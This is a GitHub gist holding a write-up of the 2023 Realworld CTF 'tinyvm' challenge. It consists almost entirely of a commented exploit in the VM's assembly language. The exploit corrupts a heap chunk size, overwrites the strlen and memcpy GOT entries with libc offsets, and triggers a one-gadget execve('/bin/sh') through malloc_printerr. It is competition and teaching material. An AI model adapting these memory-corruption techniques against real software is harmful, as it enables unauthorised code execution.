-
-
Save xf1les/80c70b4e78b630802c314ac7608dfccc to your computer and use it in GitHub Desktop.
2023 Realworld CTF tinyvm Write-Up
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Overwrite chunk size to an invaild value | |
| mov eax, 2097156 | |
| sub esp, eax | |
| mov eax, 0 | |
| push eax | |
| # Overwrite strlen GOT entry to $libc+0xEEC55 | |
| #.text:00000000000EEC55 mov rsi, r12 | |
| #.text:00000000000EEC58 mov rdi, r13 | |
| #.text:00000000000EEC5B mov rdx, r14 | |
| #.text:00000000000EEC5E call j_mempcpy | |
| mov eax, 69324792 | |
| add esp, eax | |
| mov eax, 152 | |
| add esp, eax # esp = $libc+0x219098 | |
| mov eax, 800203 | |
| pop ebx | |
| sub ebx, eax | |
| push ebx | |
| # Overwrite memcpy GOT entry to one gadget ($libc+0xebcf8) | |
| #0xebcf8 execve("/bin/sh", rsi, rdx) | |
| #constraints: | |
| # address rbp-0x78 is writable | |
| # [rsi] == NULL || rsi == NULL | |
| # [rdx] == NULL || rdx == NULL | |
| mov eax, 88 | |
| sub esp, eax # esp = $libc+0x219040 | |
| mov eax, 799240 | |
| pop ebx | |
| sub ebx, eax | |
| push ebx | |
| # Then, due to the invaild chunk size, free() will call malloc_printerr(), | |
| # which will later call j_strlen() to set rsi, rdx as zero and trigger the one gadget |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment